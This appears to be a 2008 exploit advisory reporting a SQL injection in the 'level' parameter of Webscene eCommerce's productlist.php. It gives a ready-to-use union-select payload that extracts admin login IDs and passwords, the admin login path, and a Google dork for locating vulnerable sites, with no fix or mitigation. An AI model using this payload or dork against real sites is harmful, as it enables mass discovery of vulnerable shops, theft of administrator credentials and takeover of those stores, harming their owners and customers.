#################################################################################
#
#  Webscene eCommerce (level) Remote Sql Injection
#
#  vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm
#
#################################################################################
#
#
#       Bug Found By :Angela Chang (14-10-2008)
#
#       contact: angel[at]ch4ng.cc
#
#
################################################################################
#
#
#      Greetz: nyubi & Vrs-Chk
#
#
###############################################################################

vuln file : productlist.php

Input passed to the "level" is not properly verified
before being used. This can be exploited to execute
remote sql injection.

exploit : http://somehost/productlist.php?categoryid=20&level=[sql]
          http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser--

Login admin : http://somehost/admin/

         
Google dork : inurl:productlist.php?categoryid= level

########################################################################
                   __ _             _                              _                        __ _  
  __ _    _ _     / _` |   ___     | |    __ _      o O O   __    | |_     __ _    _ _     / _` | 
 / _` |  | ' \    \__, |  / -_)    | |   / _` |    o       / _|   | ' \   / _` |  | ' \    \__, | 
 \__,_|  |_||_|   |___/   \___|   _|_|_  \__,_|   TS__[O]  \__|_  |_||_|  \__,_|  |_||_|   |___/  
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| {======|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'